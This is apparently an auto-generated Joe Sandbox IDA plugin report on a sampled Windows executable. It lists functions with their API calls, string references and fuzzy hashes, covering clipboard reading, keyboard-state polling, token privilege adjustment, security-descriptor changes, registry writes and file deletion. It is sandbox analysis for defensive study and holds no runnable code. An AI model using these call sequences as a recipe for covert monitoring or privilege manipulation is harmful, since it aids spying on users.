Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fcd2eb4146ecd31e3b91318621456d3b2115fb41b8e95e4da5045bbdbabd3b39
Instruction ID: 7e65d8ddbe39c1aa3c927b7c5320fb9c4fbd33cb4b17623d71a3cbdd80472c56
Opcode Fuzzy Hash: fcd2eb4146ecd31e3b91318621456d3b2115fb41b8e95e4da5045bbdbabd3b39
Instruction Fuzzy Hash: 6FB092340206025A9DE82E3C2A8C099330298423A97D81B82E4B8858E1923988ABE520

Function 0022547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00225486

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 9fdec61c30982f818c18e09a49aaf9dcc9574d8fea8b68e3021e25613c04b4b9
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 28B0927644021C77CE112E82FC03A697B29AB40668F408020FB0C1C162A673A6B09A89

Function 0026C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00264005: FindFirstFileW.KERNEL32(?,?), ref: 0026407C
Part of subcall function 00264005: DeleteFileW.KERNEL32(?,?,?,?), ref: 002640CC
Part of subcall function 00264005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002640DD
Part of subcall function 00264005: FindClose.KERNEL32(00000000), ref: 002640F4

GetLastError.KERNEL32 ref: 0026C292

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 245ae7fe87cb3b2842ce3768a50fb1c578dc4e482456f2419d8e7aa7567c1f4f
Instruction ID: 9010b48fdf91385f516bb33ac32a734d8089853a9363542a946c6739282025df
Opcode Fuzzy Hash: 245ae7fe87cb3b2842ce3768a50fb1c578dc4e482456f2419d8e7aa7567c1f4f
Instruction Fuzzy Hash: A2F082712202108FCB14FF59D894B69B7E5AF84720F05C059F94587352CB70BC51CF94

Non-executed Functions

Function 0028D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0028D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0028D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0028D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0028D2B8
SendMessageW.USER32 ref: 0028D2E1
_wcsncpy.LIBCMT ref: 0028D359
GetKeyState.USER32(00000011), ref: 0028D37A
GetKeyState.USER32(00000009), ref: 0028D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0028D39D
GetKeyState.USER32(00000010), ref: 0028D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0028D3D0
SendMessageW.USER32 ref: 0028D3F7
SendMessageW.USER32(?,00001030,?,0028B9BA), ref: 0028D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0028D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0028D526
SetCapture.USER32(?), ref: 0028D52F
ClientToScreen.USER32(?,?), ref: 0028D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0028D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0028D5BB
ReleaseCapture.USER32 ref: 0028D5C6
GetCursorPos.USER32(?), ref: 0028D600
ScreenToClient.USER32(?,?), ref: 0028D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 0028D669
SendMessageW.USER32 ref: 0028D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 0028D6D4
SendMessageW.USER32 ref: 0028D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0028D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0028D733
GetCursorPos.USER32(?), ref: 0028D753
ScreenToClient.USER32(?,?), ref: 0028D760
GetParent.USER32(?), ref: 0028D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 0028D7E9
SendMessageW.USER32 ref: 0028D81A
ClientToScreen.USER32(?,?), ref: 0028D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0028D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 0028D8D2
SendMessageW.USER32 ref: 0028D8F5
ClientToScreen.USER32(?,?), ref: 0028D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0028D97B

Part of subcall function 002029AB: GetWindowLongW.USER32(?,000000EB), ref: 002029BC

GetWindowLongW.USER32(?,000000F0), ref: 0028DA17

Strings

@GUI_DRAGID, xrefs: 0028D562
F, xrefs: 0028D8FB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 9fbde9452d196fba712eadc5d0ca5dffd71709dafc3e2a7383b28ae2f87eb432
Instruction ID: cbb4b9d43564657ab75f76d0b093c37466cf837605cfe0918aa0f75048d6c013
Opcode Fuzzy Hash: 9fbde9452d196fba712eadc5d0ca5dffd71709dafc3e2a7383b28ae2f87eb432
Instruction Fuzzy Hash: 99429F782253429FD724EF28D888F6ABBE5FF48310F140619F699872E1CB719868CF51

Function 00258F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00259399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002593E3
Part of subcall function 00259399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00259410
Part of subcall function 00259399: GetLastError.KERNEL32 ref: 0025941D

_memset.LIBCMT ref: 00258F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00258FC3
CloseHandle.KERNEL32(?), ref: 00258FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00258FEB
GetProcessWindowStation.USER32 ref: 00259004
SetProcessWindowStation.USER32(00000000), ref: 0025900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00259028

Part of subcall function 00258DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00258F27), ref: 00258DFE
Part of subcall function 00258DE9: CloseHandle.KERNEL32(?,?,00258F27), ref: 00258E10

Strings

, xrefs: 00258F80
default, xrefs: 00259023
winsta0, xrefs: 00258FE6

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: ef325ff90ee159f3ae19497e5f6ada146d4b7153e8fc8a395f28408f66777808
Instruction ID: 52cf8ffdf31b74429b04d5aa6158bd2166a45e93a4badf453a3e7fe54a49809f
Opcode Fuzzy Hash: ef325ff90ee159f3ae19497e5f6ada146d4b7153e8fc8a395f28408f66777808
Instruction Fuzzy Hash: 78816B7182021EFFDF119FA4DC49AEE7B79AF04315F048159FD18A6260D7318E689F14

Function 00274632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00290980), ref: 0027465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 0027466A
GetClipboardData.USER32(0000000D), ref: 00274672
CloseClipboard.USER32 ref: 0027467E
GlobalLock.KERNEL32(00000000), ref: 0027469A
CloseClipboard.USER32 ref: 002746A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 002746B9
IsClipboardFormatAvailable.USER32(00000001), ref: 002746C6
GetClipboardData.USER32(00000001), ref: 002746CE
GlobalLock.KERNEL32(00000000), ref: 002746DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0027470F
CloseClipboard.USER32 ref: 0027481F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 325ea9ae39b67842ef8260960cb14bdd2b8a145daa3f46ee19aa0a19faf10c96
Instruction ID: 7ce01fcd7fa3d6cc21e8bcbc365db9873335da49d204e5297b9d6e7e003adca8
Opcode Fuzzy Hash: 325ea9ae39b67842ef8260960cb14bdd2b8a145daa3f46ee19aa0a19faf10c96
Instruction Fuzzy Hash: CC519471264206AFD300FF60EC89F6E77ACAF94B51F00852AFA59D21D1DF70D9248B66

Function 0026F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0026F5F9
_wcscmp.LIBCMT ref: 0026F60E
_wcscmp.LIBCMT ref: 0026F625
GetFileAttributesW.KERNEL32(?), ref: 0026F637
SetFileAttributesW.KERNEL32(?,?), ref: 0026F651
FindNextFileW.KERNEL32(00000000,?), ref: 0026F669
FindClose.KERNEL32(00000000), ref: 0026F674
FindFirstFileW.KERNEL32(*.*,?), ref: 0026F690
_wcscmp.LIBCMT ref: 0026F6B7
_wcscmp.LIBCMT ref: 0026F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 0026F6E0
SetCurrentDirectoryW.KERNEL32(002BB578), ref: 0026F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 0026F708
FindClose.KERNEL32(00000000), ref: 0026F715
FindClose.KERNEL32(00000000), ref: 0026F727

Strings

S&, xrefs: 0026F6E2
*.*, xrefs: 0026F68B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S&
API String ID: 1803514871-1443972437
Opcode ID: 608a1a161a63709aa8ee8e839453c25130759ab877aac2fb9210cd4305e551db
Instruction ID: e64247ed36e41d90f0d7343c48a7509e551a982a5f5532c84c292ad14fc96985
Opcode Fuzzy Hash: 608a1a161a63709aa8ee8e839453c25130759ab877aac2fb9210cd4305e551db
Instruction Fuzzy Hash: 1931E77295021E6EDF61DFB4FD8D9DEB3AC9F09321F100166E814D20A0DB70DEA4CA60

Function 0026CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0026CDD0
FindClose.KERNEL32(00000000), ref: 0026CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0026CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0026CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 0026CE87
__swprintf.LIBCMT ref: 0026CED3
__swprintf.LIBCMT ref: 0026CF16

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

__swprintf.LIBCMT ref: 0026CF6A

Part of subcall function 002238C8: __woutput_l.LIBCMT ref: 00223921

__swprintf.LIBCMT ref: 0026CFB8

Part of subcall function 002238C8: __flsbuf.LIBCMT ref: 00223943
Part of subcall function 002238C8: __flsbuf.LIBCMT ref: 0022395B

__swprintf.LIBCMT ref: 0026D007
__swprintf.LIBCMT ref: 0026D056
__swprintf.LIBCMT ref: 0026D0A5

Strings

%02d, xrefs: 0026CF5E, 0026CF68, 0026CFB6, 0026D005, 0026D054, 0026D0A3
%4d, xrefs: 0026CF10
%4d%02d%02d%02d%02d%02d, xrefs: 0026CECD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 853bd4830754f8f69b5cbb64349784eaa593d0f9c17a9a6faff7c50dfc7ed3c2
Instruction ID: ad59eb82aa36d7217cccc36bfb9918dfae4277d69cc8b3829f1bdcb39984eeb7
Opcode Fuzzy Hash: 853bd4830754f8f69b5cbb64349784eaa593d0f9c17a9a6faff7c50dfc7ed3c2
Instruction Fuzzy Hash: 16A160B1424305ABC714FFA4D885DAFB7ECEF94700F404919F685C6192EB70EA68CB62

Function 00280EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00280FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00290980,00000000,?,00000000,?,?), ref: 00281021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00281069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002810F2
RegCloseKey.ADVAPI32(?), ref: 00281412
RegCloseKey.ADVAPI32(00000000), ref: 0028141F

Strings

REG_EXPAND_SZ, xrefs: 0028108F
REG_DWORD, xrefs: 002812E3
REG_SZ, xrefs: 00281130
REG_QWORD, xrefs: 00281360
REG_BINARY, xrefs: 002813AD
REG_MULTI_SZ, xrefs: 002811DA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 70134ef8b5a92e4e2f739fa55f97c6af550494f5e11443b32ac52f042e13ce84
Instruction ID: 6d8aff95b46382586617e218899bfa5c1bebb46085197e6849c3f9d2816c55de
Opcode Fuzzy Hash: 70134ef8b5a92e4e2f739fa55f97c6af550494f5e11443b32ac52f042e13ce84
Instruction Fuzzy Hash: 00025B752206119FCB14EF24C885E2AB7E5FF88714F04895DF95A9B2A2CB30ED61CF91

Function 0026F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0026F756
_wcscmp.LIBCMT ref: 0026F76B
_wcscmp.LIBCMT ref: 0026F782

Part of subcall function 00264875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00264890

FindNextFileW.KERNEL32(00000000,?), ref: 0026F7B1
FindClose.KERNEL32(00000000), ref: 0026F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 0026F7D8
_wcscmp.LIBCMT ref: 0026F7FF
_wcscmp.LIBCMT ref: 0026F816
SetCurrentDirectoryW.KERNEL32(?), ref: 0026F828
SetCurrentDirectoryW.KERNEL32(002BB578), ref: 0026F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 0026F850
FindClose.KERNEL32(00000000), ref: 0026F85D
FindClose.KERNEL32(00000000), ref: 0026F86F

Strings

j&, xrefs: 0026F82A
*.*, xrefs: 0026F7D3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j&
API String ID: 1824444939-4196442018
Opcode ID: c70598ed42791716d1315008258daa21b295014857dc5e28c44231517dd3d086
Instruction ID: 1c50a7114e80c687e1d0ccc8852a6c3a67421154a86537de22df1648ce521526
Opcode Fuzzy Hash: c70598ed42791716d1315008258daa21b295014857dc5e28c44231517dd3d086
Instruction Fuzzy Hash: CC31A77295021E7EEF61DFB5FD88ADE776C9F09321F1001A5E804A31A1DB70DEA58B60

Function 002588CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00258E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00258E3C
Part of subcall function 00258E20: GetLastError.KERNEL32(?,00258900,?,?,?), ref: 00258E46
Part of subcall function 00258E20: GetProcessHeap.KERNEL32(00000008,?,?,00258900,?,?,?), ref: 00258E55
Part of subcall function 00258E20: HeapAlloc.KERNEL32(00000000,?,00258900,?,?,?), ref: 00258E5C
Part of subcall function 00258E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00258E73

Part of subcall function 00258EBD: GetProcessHeap.KERNEL32(00000008,00258916,00000000,00000000,?,00258916,?), ref: 00258EC9
Part of subcall function 00258EBD: HeapAlloc.KERNEL32(00000000,?,00258916,?), ref: 00258ED0
Part of subcall function 00258EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00258916,?), ref: 00258EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00258931
_memset.LIBCMT ref: 00258946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00258965
GetLengthSid.ADVAPI32(?), ref: 00258976
GetAce.ADVAPI32(?,00000000,?), ref: 002589B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002589CF
GetLengthSid.ADVAPI32(?), ref: 002589EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002589FB
HeapAlloc.KERNEL32(00000000), ref: 00258A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00258A23
CopySid.ADVAPI32(00000000), ref: 00258A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00258A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00258A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00258A95

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 48ab988e83d402267ee03917bded19f4e08c04e8e34e57e66497423fb0c51395
Instruction ID: 707d2683685a06ec315156dcb747b3eaafb2c02020e6022b7d882b387d4e67c8
Opcode Fuzzy Hash: 48ab988e83d402267ee03917bded19f4e08c04e8e34e57e66497423fb0c51395
Instruction Fuzzy Hash: CA614C7591010ABFDF00DFA5EC85EAEBB79FF04311F04811AF815A6290DB759A29CF64

Function 00280A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0028147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028040D,?,?), ref: 00281491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00280B0C

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00280BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00280C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00280E82
RegCloseKey.ADVAPI32(00000000), ref: 00280E8F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 4948f6391996bbc5274d6837032899b017f63c117e41294a9ba677a15fc77e82
Instruction ID: 83b3bc974bd1fa50e0aaec9304048f66362e1f64d901548bd6fb94ef33d890c0
Opcode Fuzzy Hash: 4948f6391996bbc5274d6837032899b017f63c117e41294a9ba677a15fc77e82
Instruction Fuzzy Hash: 18E16D75214211AFC754EF28C885E2BBBE4EF89314F04896DF949DB2A2DA30ED25CF51

Function 00260508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00260530
GetAsyncKeyState.USER32(000000A0), ref: 002605B1
GetKeyState.USER32(000000A0), ref: 002605CC
GetAsyncKeyState.USER32(000000A1), ref: 002605E6
GetKeyState.USER32(000000A1), ref: 002605FB
GetAsyncKeyState.USER32(00000011), ref: 00260613
GetKeyState.USER32(00000011), ref: 00260625
GetAsyncKeyState.USER32(00000012), ref: 0026063D
GetKeyState.USER32(00000012), ref: 0026064F
GetAsyncKeyState.USER32(0000005B), ref: 00260667
GetKeyState.USER32(0000005B), ref: 00260679

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 137a9995b0a8778c45ff6364bc5c9d251578ad12f5a1282cb9e2c671d047132e
Instruction ID: 359e34809e517fc11849ea0eef70e0eb0ddd7efcfe5f42bcf9e7fe4c838bd312
Opcode Fuzzy Hash: 137a9995b0a8778c45ff6364bc5c9d251578ad12f5a1282cb9e2c671d047132e
Instruction Fuzzy Hash: C041E9209247CB5DFF318E64C8843B7BEA4BB51304F44405AD6C6461C1EB9499F4DFA6

Function 0026443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00264451
__swprintf.LIBCMT ref: 0026445E

Part of subcall function 002238C8: __woutput_l.LIBCMT ref: 00223921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00264488
LoadResource.KERNEL32(?,00000000), ref: 00264494
LockResource.KERNEL32(00000000), ref: 002644A1
